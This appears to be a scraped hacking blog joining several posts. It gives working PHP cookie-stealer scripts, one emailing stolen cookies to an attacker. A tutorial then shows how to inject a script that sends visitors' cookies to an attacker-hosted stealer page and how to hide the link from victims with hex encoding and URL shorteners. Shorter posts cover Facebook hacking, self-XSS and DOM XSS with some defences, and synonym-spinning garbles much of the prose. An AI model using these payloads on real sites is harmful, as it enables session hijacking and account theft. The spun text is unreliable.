How to make cookie stealer Programming in PHP?~ get via email

Here is the easy cookie Stealer code:
Cookie saved in File:

<?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie ."\\n");
fclose($steal);
?>

$cookie = $HTTP_GET_VARS["cookie"]; grab the biscuit from the present url(stealer.php?cookie=x)and shop the cookies in $cookie varying.

$steal = fopen("cookiefile.txt", "a"); This start the cookiefile in add method so that we can add the thieved biscuit.

fwrite($steal, $cookie ."\\n"); This will shop the thieved biscuit within the computer file.

fclose($steal); near the started out computer file.

Another version: Delivers cookies to the cyberpunk email 

 

<?php
$cookie = $HTTP_GET_VARS["cookie"]; mail("hackerid@mailprovider.com", "Stolen Cookies", $cookie);
?>

The above value will email the cookies to cyberpunk email using the PHP() email operate with topic "Stolen cookies". 

Third Version

<?php
function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}
function logData()
{
    $ipLog="log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_gobals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date=date ("l dS of F Y h:i:s A");
    $log=fopen("$ipLog", "a+");

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");
    fclose($log);
}
logData();
?>

 The above cookie stealer will shop the following information:
Ip address
port number
host(usually computer-name)
user agent
cookie

This Content is for Academic objective only, published for Moral Online hackers. This details is for developing attention about the Internet Threats.

Read More

How to do cookie Taking with Combination website Scripting Weeknesses ? : XSS Tutorials

if anyone, tries these online hackers against any company or whatever that creates him to trespass the safety actions and delivers him under the lawful justice. This guide is ideal for the enhancement of security and for PenTesting,  research by lawful security organizations.

Requirements:

A cookie Stealer value : Get it from here

Free Web web host service

Basic Information about XSS

Basic Information about Pc Cookies

Cookie taking is the procedure of taking advantage of the XSS weeknesses (Non-persistent/persistent) and grab the cookie from the sufferer who check out the contaminated weblink. These cookie will be used to bargain their records.

Step 1: Developing Cookie Stealer PHP file

Get the Cookie stealer from the weblink i described.  In that publish, i have described three editions of cookie stealer.  We are going to use the third edition.

Copy the value.

Open Note pad and insert the code

Save the information file with .php extension

Eg: Stealer.php

Now make New information file and preserve it as log.txt (leave it as blank). Don't modify the name , this is the filename what we give up php information file.

Now you will have two files;

1. Stealer.php

2. log.txt

What these two information files do exactly?

The above Stealer.php information file get ip deal with,cookie and shops the information in log.txt information file.

The log.txt has cookies , ip deal with information.

Step 2: 

Register in a 100 % free web-hosting assistance and sign in into your cpanel.

Now start the File Administrator in cpanel.

Upload the Stealer.php and log.txt to main directory or public_html directory.

Now the stealer will be at hxxp://www.YourSite.com/Stealer.php .

Step 3: Exploiting the XSS Vulnerability

So Far , we have pointed our saw.  Now we are going to use it.

Once you set up everything and discover a Insecure website,then provide the following value in the Insecure websites.

<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

For example:

hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

Cookie Stealing with Non-Persistent vs Chronic XSS:

Persistent: if you provide this value in Chronic XSS vulnerable website, it will be there permanently until administration discover it.  It will be proven to all customers.  So assailants don't need to deliver any weblink to others.  Whoever visitthe web page, they will be vicim.

Non-Persistent:

In situation of Non-persistent strike, enemy will deliver the weblink to sufferers. Whenever they check the site, it will grab the cookie.  Most of websites are susceptible to Non-persistent XSS .

In Non-persistence, Attackers will deliver the treated weblink sufferers.

For example:

hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

The above weblink is clearly reveals the programs.  Hackers can Hex-encode this program  so that sufferer can't see the program.

For Example:

hxxp://www.VulnerableSite.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e

Still , the weblink look lengthy. The enemy use one more technique to cover up the lengthy url i.e url reducing websites. There are lot of websites that reduce the lengthy url into small url.

For example:

hxxp://www.tinyexample.com/twrwd63

Once the sufferer check the site, his cookie will be saved in log.txt information file.

How to be Protected from this attack?

Use No-Script Add-on. This is best security to keep away from XSS

Never Simply select the Shorten url

Sometime you may want to adhere to the reduce weblink.  If so, then obvious all cookies in your web browser and check out through Proxies or VPN(it will cover up your ip.

Read More

protecting actions against hacking

Possible solutions to Web page Vulnerabilities

Malicious hacking often takes mainly two factors, some time to program. This implies that most web websites or applications are insecure in some way. But it also indicates that most flaws can be secured by some time to applications; for example, in the perspective of hacking, the difference between a five-digit security password and an eight-digit security password along with a number is roughly 22,000 decades. I mean by this that it would take a cyberpunk, using some kind of thesaurus strike program around 22,000 decades to discover your security password if it was eight alphanumeric figures. As a standard principle, implement your customers into creating security passwords of at least 8 figures long and ask them generously not consist of words discovered in the thesaurus. This is for your website's security as much as their own and that of their other customers.

Web Forms

Web types are an simple focus on for online hackers or anyone who basically wants to break your applications, as the user is given the opportunity to successfully pass details to your web hosting server, which functions computations using that details.

Closely related to invisible area adjustment, barrier overruns are designed in a identical fashion; any text feedback area with a maxchar=n residence can be used to possibly closed down the hosting server. The source value can be utilized, and the maxchar residence eliminated. The cyberpunk then goes into, say, 10,000 ones and gives up the type. What happens next? The hosting server turns down, taking your business with it. A semi-secure remedy to this would again be to protected any HTML type source. A better remedy would be to spend storage dynamically, therefore not presetting the storage barrier to a certain size, or writing a function that assessments the duration of the feedback before moving the results to the hosting server. If the feedback surpasses the storage allowance, basically successfully pass returning a NULL value.

A simple, yet effective technique in stopping online hackers is to set up your web hosting server to hand out specialised mistake 404 pages with a position of 200 when a source is not discovered. Most authentic customers will not even notice, and a cyberpunk using program to check out for available sources will think they have came across a silver my own. When the cyberpunk goes to check, they will discover that they have been tricked and hopefully see analyzing your site further as a pointless. This could be seen as hacking online hackers or the cyberpunk becoming the compromised...

Netcat

You could take this one step further and use an old UNIX program called netcat to accident anyone who efforts to crack your site. Netcat makes and allows TCP relationships, but it can be used by a cyberpunk for many factors, such as acquiring distant accessibility a spend, port-scanning and even hi-jacking solutions and skipping fire walls. It can also be used to observe slots and overflow dubious demands, just like a barrier over-run, by using it to imagine you are running a assistance that you are not and using the 'yes' control when someone tries to manipulate that assistance. Netcat is an effective program in itself and is usually part of any self-respecting hackers' tool-kit. Fairly, you could look at this as reaching it returning first.

Conclusion I hope that I have attracted your attention to some of the more primary but often neglected entry-points that a cyberpunk may use to gain admission to your web applications, and outlined the need for primary auditing of the security administration of your site.

This article is not designed to be a complete remedy for protection against hacking, but more the kick off point for your concerns. No website is completely hack-proof, but there are few websites that really need to be. As a web designer ,your primary security concern is first to evaluate how much security you will actually need. The more protected you need to be, the more your is designed will move toward choosing the solutions of a professional security remedy.

   

PREVENTING HACKING ACTIVITY

The most well-known method of security against hacking among personal house people who use computers is anti-virus program. Companies such as McAfee.com Corp. provide anti-virus program that tests a pc's hard drive for contaminated material, notifying customers when bad data files are discovered. Firewalls, typically used for pc systems, have also become well-known with house customers, particularly those who use constant online relationships such as wire locations and digital prospective subscriber lines. Firewalls act as a obstruction to hacking by defending private systems from the public, thus keeping most strangers from tampering with pcs.

Other program options—mainly used to protected larger pc systems—include Attack Recognition Techniques (IDS), material filtration program, sand-boxing program, and actions research program. IDS is considered one of the best security methods for huge systems. With an IDS in place, program directors can observe network demands and identify large-scale harmful strikes. Content filtration program is innovative anti-virus program that flows compacted data files and allows IT supervisors to set specific filtration factors to prevent harmful email. Sand-boxing program defends against harmful requirements. The program makes a secured space within a pc where dubious value can run, before it has a chance to communicate with the primary os. Still in its beginnings in 2001, actions research program defends pcs by tracking entire systems and verifying every control of all functions.

window.google_render_ad();

Unfortunately, many harmful online hackers eye security systems systems not as a obstruction but as a simple hurdle to get over. However, as long as hacking strikes continue, both individuals and businesses will continue to spend money on applications and program designed to protected systems from undesirable visitors

A Few Protecting Measures

-If you utilize a web cms, register to the development blog.

-Update to new editions soon as possible. Upgrade all 3rd party segments as a matter of course — any segments including web types or allowing member file submissions are a potential risk. Component flaws can offer accessibility your full data source.

-Harden your Web CMS or posting foundation. For example, if you use WordPress, use this guide as a referrals.

-If you have an administration sign in web page for your customized made CMS, why not call it ‘Flowers.php’ or something, instead of “AdminLogin.php” etc.?

-Enter some complicated data into your sign in areas like the example Hypodermic injection post shown above, and any else which you think might befuddle the hosting server. If you get an uncommon mistake concept exposing server-generated value then this may betray weeknesses.

-Do a few Google hackers on your name and your site. Just in case…

-Use a no-right-click program.

This stops simple duplicating of images and easily watching the source. Note: This can be circumvented by using Javascript.

-Use supports.

This stops watching of the source from the top of the site. Note: This can be circumvented by using web browser history.

-Encrypt the supports web page.

-Encryption can stop online hackers completely. By using several security applications sources become un-readable. Note: Even security can be defeated.

Read More

How Do You Secure Your System Against Hackers?

Program protection is a serious matter. A network allows you to discuss information and sources, but it also allows pc malware, human criminals, or even dissatisfied workers do far more harm than they could on a single device. Think about what would happen if every bit of information on your lan (LAN) disappeared, and you'll understand why protection is so important.
Here is a brief list of safety actions to think about when you're setting up a LAN:
• Virtual information still needs physical protection. This could mean maintaining your hosting server in a closed room, eliminating hard pushes from work stations that don't need them, and setting up an home security system in your workplace. All the protection application in the world won't stop someone from splitting into your workplace and carting off your pc systems.
• Beware of insects. Most pc malware are just a hassle, but it takes only one malicious malware to bring your network to its legs. Set up efficient anti-virus application, keep it modified, and practice your workers to use it. Think about other safety actions, such as setting up only shrink-wrapped professional application on your pc systems.
• Network protection is a everyday job. Stay on top of changes that could impact the protection of your LAN. Keep your os modified with the newest protection areas and bug repairs. Allocate access to internet directories and other network sources on a need-to-have foundation, and eliminate a customer's account instantly when they keep your company. Use network signing and protection assessments to check your network for protection gaps and possible break-ins.


• Pay attention to security passwords. One bad security password can bargain your entire system. Avoid security passwords that contain thesaurus terms or private information, and require customers to change their security passwords consistently. When an worker results in the company, turn off their security password instantly as part of the cancellations process.
• Don't let trouble come contacting. Take special safety measures if you link your LAN to the outside world through a wi-fi hot spot at your local cafe or collection. Prevent wi-fi strikes by using secured security passwords or firewall program, which can be in the form of convenient components, such as a USB dongle.
• Install a application firewall program. If you link your LAN straight to the Internet, set up a firewall program to screen both inbound and confident traffic. A application firewall program like Area Laboratories ZoneAlarm will also secure your system against harmful programs known as Virus horse that let criminals get into and take over your pc.
You may also like:
Protection Against Hacking

Read More

Free Facebook or myspace Id Coughing E-book Now

FREE DOWNLOAD

Table of Material : 
1. Facebook or myspace Guidelines &amp; Techniques     
1.1 Facebook or myspace Guidelines     
1.2. a way to get noticable Facebook or myspace variety   
1.3. a way to access Facebook or myspace from G mail
1.4. Facebook or myspace Feelings codes
1.5. a way to exchange Facebook or myspace in your PC…
 1.6. exchange your data 
1.7. Transfer your publication in Facebook or myspace 
    1.8. a way to get noticable if someone compromised your Facebook or myspace account
1.9. a way to variation your name in Facebook
1.10. Trade Contact information of your Facebook or myspace account
1.11. a way to generate Facebook or myspace ID card  
    1.12. a way to cover up your Current e-mail deal with from Facebook or myspace apps
1.13. a way to Remove and Stop Facebook or myspace consideration 
1.14. a way to exchange Facebook or myspace image record 
   1.15. a way to add a community (discussion board) to a web page 
    1.16. Experience guide anti-virus   
----------------------- Page 3-----------------------
1.17. a way to aware Facebook or myspace fan web page in your E-mail…  
 1.18. a way to Show UN organization is on-line on Facebook or myspace after you ar in off-line mode…
    1.19. a way to deliver SMS victimisation Facebook… 
   1.20. a way to get noticable new pages you would possibly like  
  1.21. a way to watch loading TV on Facebook or myspace  
   1.22. a way to generate a map of your Facebook or myspace friend…     
1.23. Cartoon image in Experience guide 
  1.24. colored written text, strong, underline, happiness in Facebook or myspace status…
    1.25. a way to turn off Facebook or myspace Timeline…    
1.26. a way to turn off Public search of your Facebook or myspace information 
    1.27. a way to Post your Vacant standing
1.28. a way to Browse Obstructed Facebook or myspace 
2. Facebook or myspace internet Programs   
 2.1. a way to Routine Facebook or myspace deep massages Sendible     
 2.2. a way to get Facebook or myspace up-dates on your Email  
  2.3. a way to up-dates Facebook or myspace while not victimisation Experience guide    
 2.4. a way to be give observe once buddy changes tasks     
2.5. a way to study Facebook or myspace Profile History   
----------------------- Page 4-----------------------
    
2.6. a way to Turn Facebook or myspace status up-dates     
2.7. a way to get noticable Distributed video clips on Facebook or myspace    
 2.8. Catch the knowledge of your social System    
 2.9. Observe your kid Facebook or myspace action     
 2.10. Handle your personal &amp; experienced image  
  2.11. a way to track Facebook or myspace Actions  
  2.12. generate mosaics Profile image on Facebook
2.13. on-line store on Facebook or myspace    
  2.14. on-line Experience guide Messenger…    
2.15. a way to Research Facebook or myspace Fan page…     
 2.16. a way to get noticable UN organization U. s. Countries friends you  
  2.17. a way to exchange Videos from Facebook or myspace     
2.18. a way to generate slide show of your Facebook or myspace record     
2.19. a way to generate Customized Facebook or myspace tab
2.20. a way to get Experience guide in exceed  
   2.21. a way to link Search engines documents to Facebook
 3. Facebook or myspace software system &amp; Plug-ins     
 3.1. Facebook or myspace Color Filter   
----------------------- Page 5-----------------------
    3.2. Facebook or myspace contributes blocker   
  3.3. a way to link Facebook or myspace, Twitter&amp; Search engines 
3.4. Facebook or myspace Toggle all  
  3.5. a way to Facebook or myspace Talk on your pc Adium
    3.6. Facebook or myspace based mostly applications program 
     3.7. Facebook or myspace E email distressing person   
 3.8. a way to link perspective to Facebook or myspace 

    4. Facebook or myspace Coughing &amp; Security   
  4.1. Facebook or myspace phishing  
  4.2. Facebook or myspace parole Decryp
tor  
  4.3. applications program Successfully pass study … 
   4.4. a way to Crack Facebook or myspace victimisation Key logger   
   4.5. a way to Crack parole victimisation Facebook or myspace Cyberpunk  
    4.6. a way to delete Your buddy Account inside twenty four hour
    4.7. a way to protect your Facebook or myspace consideration from Coughing   
  4.8. a way to protect yourself from Key logger &amp; phishing attack

FREE DOWNLOAD

Read More

What is Computer/Browser Cookies? ~Use of Cookies

 What is Cookies?
HTTP cookie or Online browser Cookie are used to shop the details about the guests. Also cookies used to shop the Sign in informations(username ,passwords). It will be useful to monitor guests wish so that display the appropriate details or ads.

Different Kinds of Cookies:

Session cookie

A period cookie up to certain time,depending on website.  After the period time, it will be damaged.

Persistent Cookie

A chronic cookie will last longer than customer classes. If a chronic cookie has its Max-Age set to 1 season, then, within the season, the preliminary value set in that cookie would be sent back to the hosting server whenever the customer frequented the hosting server. This could be used to history a essential item of details such as how the customer originally came to this website. Because of this, chronic cookies are also known as monitoring cookies or in-memory cookies.

Secure cookie

Secure cookies are secured cookies. If you used HTTPS(secure Connection), then it will shop the cookies in secured structure. Even online hackers grab the cookie, he is able to see only the secured information.

Example:

Bank sites always use Protected Cookies.

HttpOnly cookie

The HttpOnly cookie is reinforced by most contemporary internet explorer. On a reinforced browser, an HttpOnly period cookie will be used only when transferring HTTP (or HTTPS) demands, thus reducing accessibility from other, non-HTTP APIs (such as JavaScript). This limitation mitigates but does not remove the risk of period cookie robbery via Cross-site scripting.[15]. It is essential recognize this function is applicable only to session-management cookies, and not other browser cookies.

Third-party cookie

Third-party cookies will shop the cookies with another sector.

For Example:

www.example.com will shop the cookies with ad.advertise12.com

At one time, another website also set cookies with same sector.

www.othersite.com will shop the cookies with ad.advertise12.com

Supercookie

A "supercookie" is a cookie with a community suffix sector, like .com, .co.in,.in.

Most internet explorer, by standard, allow first-party cookies—a cookie with sector to be the same or sub-domain of the inquiring variety. For example, a customer viewing www.example.com can have a cookie set with sector www.example.com or .example.com, but not .com. A supercookie with sector .com would be obstructed by browsers; otherwise, a harmful website, like enemy.com, could set a supercookie with sector .com and probably affect or impersonate genuine customer demands to example.com.

Zombie cookie

A zombie cookie is any cookie that is instantly regenerated after a customer has removed it. This is achieved by a program saving the material of the cookie in some other places, such as the regional storage space available to Display material, HTML5 storages and other customer aspect systems, and then re-creating the cookie from back-up shops when the cookie's lack is recognized.

What is the use of Cookies?

Session management

Cookies may be used to sustain information appropriate to the customer during routing, probably across several trips. Cookies were presented to offer a way to apply a "shopping cart" (or "shopping basket"), a exclusive system into which customers can shop products they want to buy as they get around throughout the website.

Personalization

Cookies may be used to keep in mind the details about the customer who has frequented a website to be able to demonstrate appropriate material later on. For example a web hosting server may deliver a cookie containing theusername last used to log in to a website so that it may be loaded in for upcoming trips.

Tracking

Tracking cookies may be used to monitor internet users' web surfing around routines. This can also be done in aspect by using the IP deal with of the pc inquiring the site or the referrer area of the HTTP demand headlines, but cookies allow for higher perfection.

Read More

Self-XSS (Cross Website Scripting) :Social Technological innovation Strike and Avoidance (Facebook)

What is Self-XSS?
Self-XSS is one of the popular Social Technological innovation Strike used by Assailants to technique customers into insert the harmful value in web browser.  Results in enemy obtaining to the whatever website you visit. Usually fraudsters use this attack for fooling customers to buy products or get money through paid study .

Recently, Online hackers Assaulted Facebook or myspace with precise serious adult pictures. Facebook or myspace says it might be self-Xss Attack .

Javascript can be implemented in web browser url bar.
For example , enter the following code in your browser:

javascript:alert('BreakTheSecurity');

This will display a pop up box with "BreakTheSecurity".  An enemy can use this for harmful objective. He can grab Private information, biscuits, divert to viruses websites and more.
For Eg:
Entering the following value will display the biscuits in your browser:

javascript:alert("Cookies:"+document.cookies+"  "+"\n By \n BreakTheSecurity");

The above value is not going to anything maliciously other than showing the biscuits.  But an enemy can increase the program so that it can take benefits your information.

Security Guidelines from BreakTheSecurity:
Use NoScript add on that will avoid javascript operating in your web browser.
Don't simply select the shorthand web addresses for Example: bit.ly/55ewEb?22.  This may divert to an contaminated websites.

Conscious of Public Engineering:
If anyone ask you(even if he is your friend) to insert the programs in web browser bar, Never do this error.  
If anyone says "Iphone only $10", Don't desperate to just click it. 
If anyone says "1000 stocks will treat a baby", Never do this error. Facebook or myspace stocks never help to get cash or help to treat child.
God provide us with the 6th Feeling,Use it and think before you just click any hyperlinks or following the other guidelines.

Read More

DOM Centered Combination Website Scripting(XSS) weeknesses Tutorial

What is DOM?

DOM is extended as Papers item design that allows client-side-scripts(Eg: Javascript) to dynamically accessibility and change the material, framework, and design of a web site.

Like server-side programs, client-side programs can also agree to and operate customer feedback with the help of DOM.

Here is a very easy HTML value that allows and creates customer feedback using JavaScript with the help of DOM.

<html> 

<head>

</head>

<body>

     <script>

var pos=document.URL.indexOf("BTSinput=")+9;  //finds the place of value 

var userInput=document.URL.substring(pos,document.URL.length); //copy the value into userInput variable

document.write(unescape(userInput)); //writes material to the webpage

  </script>

</body>

</html>

If you know HTML and Javscript, knowing the above value is easy.

In the above example, the javascript value gets value from the url parameter "BTSinput" and creates the value in our web site.

For example, if the url is

               www.BreakThesecurity.com/PenTesting?BTSinput=default

The web site will show "default" as outcome.

Did you observe ?! The aspect of the web site is not published by Server-side program.  The consumer aspect program changes the material dynamically depending on the feedback.   Everything done with the help of DOM item 'document'.

DOM Centered XSS vulnerability:

When a designer creates the material using DOM item without cleaning the customer feedback , it allow an enemy to run his own value.  

In above example, we did not clean the feedback and basically shown the whatever value we get from the url.  

An enemy with harmful objective can provide a xss vector instead .  For example:

www.BreakThesecurity.com/PenTesting?BTSinput=<script>alert("BreakTheSec")</script>

As i said previously, the papers.write operate basically creates the value of BTSinput parameter in the website.  So it will create the '<script>alert("BreakTheSec")</script>' in the website without cleaning.  This outcomes in operating the program value and shows the aware box.

Patching the DOM Centered Combination Website Scripting Vulnerability

Audit all JavaScript value in use by your program to create sure that untrusted information is being runaway before being published into the papers, analyzed, or sent as aspect of an AJAX demand. There are a multitude of JavaScript features and qualities which must be secured, such as some which are rather non-obvious:

The papers.write() function

The papers.writeln() function

The eval() operate, which carries out JavaScript value from a string

The execScript() operate, which performs in the same way to eval()

The setInterval(), setTimeout(), and navigate() functions

The .innerHTML residence of a DOM element

Certain CSS qualities which allow URLs such as .style, .backgroundImage, .listStyleImage, etc.

The occasion owner qualities like .onClick, which take JavaScript value as their values

Any information which is resulting from information under the customer's management (e.g. demand factors, headers, question factors, biscuit titles and principles, the URL of the demand itself, etc.) should be runaway before being used. Illustrations of user-controlled information consist of papers.location (and most of its qualities, e.g. papers.location.search), papers.referrer, biscuit titles and principles, and demand headlines titles and principles.

You can use the JavaScript built-in features encode() or encodeURI() to deal with your getting out of. If you create your own getting out of features, be incredibly cautious. Rather than using a "black list" strategy (where you narrow risky figures and successfully pass everything else through untouched), it is better to use a "white list" strategy. A excellent white-colored record strategy is to evade everything by standard and allow only alphanumeric figures through.

REFERENCE

Read More

Combination Website Scripting(XSS) Finish Guide for Beginners~ Web Program Vulnerability

What is XSS?
Cross Site Scripting also known as XSS , is one of the most typical web appliction weeknesses that allows an enemy to run his own customer part scripts(especially Javascript) into web pages viewed by other customers.

In a typical XSS strike, a cyberpunk provide his harmful javascript value in the legitimate website . When a customer examine out the specially-crafted weblink , it will perform the harmful javascript. A efficiently utilized XSS weeknesses will allow assailants to do phishing strikes, grab accounts and even viruses.

Example :Let us think about, a cyberpunk has discovered XSS weeknesses in Googlemail and injectmalicious program. When a customer examine out your website, it will perform the harmful program. The harmful value can be used to divert customers to fake search engines mail web page or capture biscuits. Using this thieved biscuits, he can sign in into your consideration and change security password.

It will be clear and understandable XSS , if you have the following prerequisite:

Strong Information in HTML,javascript(Reference).

Basic Information in HTTP client-Server Architecure(Reference)

[optional]Basic Information about hosting server part programming(php,asp,jsp)  

XSS Attack:

Step 1: Discovering Insecure Website

Hackers use search engines lady for choosing the vulnerable websites for example  "?search=" or ".php?q=" .  1337 target specific websites instead of using look for.  If you are going to analyze your site, you have to examine every web page in your site for the weeknesses. 

Step 2: Testing the Vulnerability:

First of all, we have to discover a feedback area so that we can provide our own program, for example: look for box,username,password or any other feedback areas.

Test 1 :

Once we discovered the feedback area, let us try to put some sequence within the area, for example let me feedback "BTS". It will show the  result .

Now right click on the page and select view source.   search for the string "BTS" which we entered in the input field.  Note the location where the input is placed.

Test 2:

Now we are going to examine whether the hosting server clean our feedback or not.  In order to do this , let us feedback the <script> tag within the feedback area. 

 

View the source of the page . Find the location where input displayed place in previous test.

Thank god, our code is not being sanitized by the server and the code is just same as what we entered in the field. If the server sanitize our input, the code may look like this &lt;script&gt;. This indicates that the website vulnerable to XSS attack and we can execute our own scripts .

Step 3: Exploiting the vulnerability
Now we know the site is somewhat vulnerable to XSS attack.  But let us make sure whether the site is completely vulnerable to this attack by injecting a full javascript code.  For instance, let us input <script>alert('BTS')</script> .

Now it will display pop-up box with 'BTS' string. Finally, we successfully exploit the XSS .  By extending the code with malicious script, a hacker can do steal cookies or deface the site and more.

Types of XSS Based on persisting capability:
Based one Persistence capability, we can categorize the XSS attack into two types namely Persistent and Non-Persistent.

Persistent XSS:

The Persistent or Stored XSS attack occurs when the malicious code submitted by attacker is saved by the server in the database, and then permanently it will be run in the normal page.

For Example:   
Many websites host a support forum where registered users can ask their doubts by posting message  , which are stored in the database.  Let us imagine , An attacker post a message containing malicious javascript code instead.  If the server fail to sanitize the input provided, it results in execution of injected script.  The code will be executed whenever a user try to read the post. If suppose the injected code is cookie stealing code, then it will steal cookie of users who read the post. Using the cookie, attacker can take control of your account.


Non-Persistent XSS:

Non-Persistent XSS, also referred as Reflected XSS , is the most common type of XSS found now a days. In this type of attack, the injected code will be send to the server via HTTPrequest.  The server embedd the input with the html file and return the file(HTTPResponse) to browser.  When the browser executes the HTML file, it also execute the embedded script.  This kind of XSS vulnerability frequently occur in search fields.

Example:
Let us consider a project hosting website.  To find our favorite project, we will just input the related-word in the search box .  When searching is finished, it will display a message like this "search results for yourword " .  If the server fail to sanitize the input properly, it will results in execution of injected script.

In case of reflected XSS attacks, attacker will send the specially-crafted link to victims and trick them into click the link. When user click the link, the browser will send the injected code to server, the server reflects the attack back to the users' browser.  The browser then executes the code .

In addition to these types, there is also third  type of attack called DOM Based XSS attack, i will explain about this attack in later posts.

What can an attacker do with this Vulnerability?

• Stealing the Identity and Confidential Data(credit card details).
• Bypassing restriction in websites.
• Session Hijacking(Stealing session)
• Malware Attack
• Website Defacement
• Denial of Service attacks(Dos)

Skipping the XSS filteration :A useful guide

Reference:

Mass Iframe Injection Tutorials

Disclaimer:

This article is intended for educational purpose only.

Read More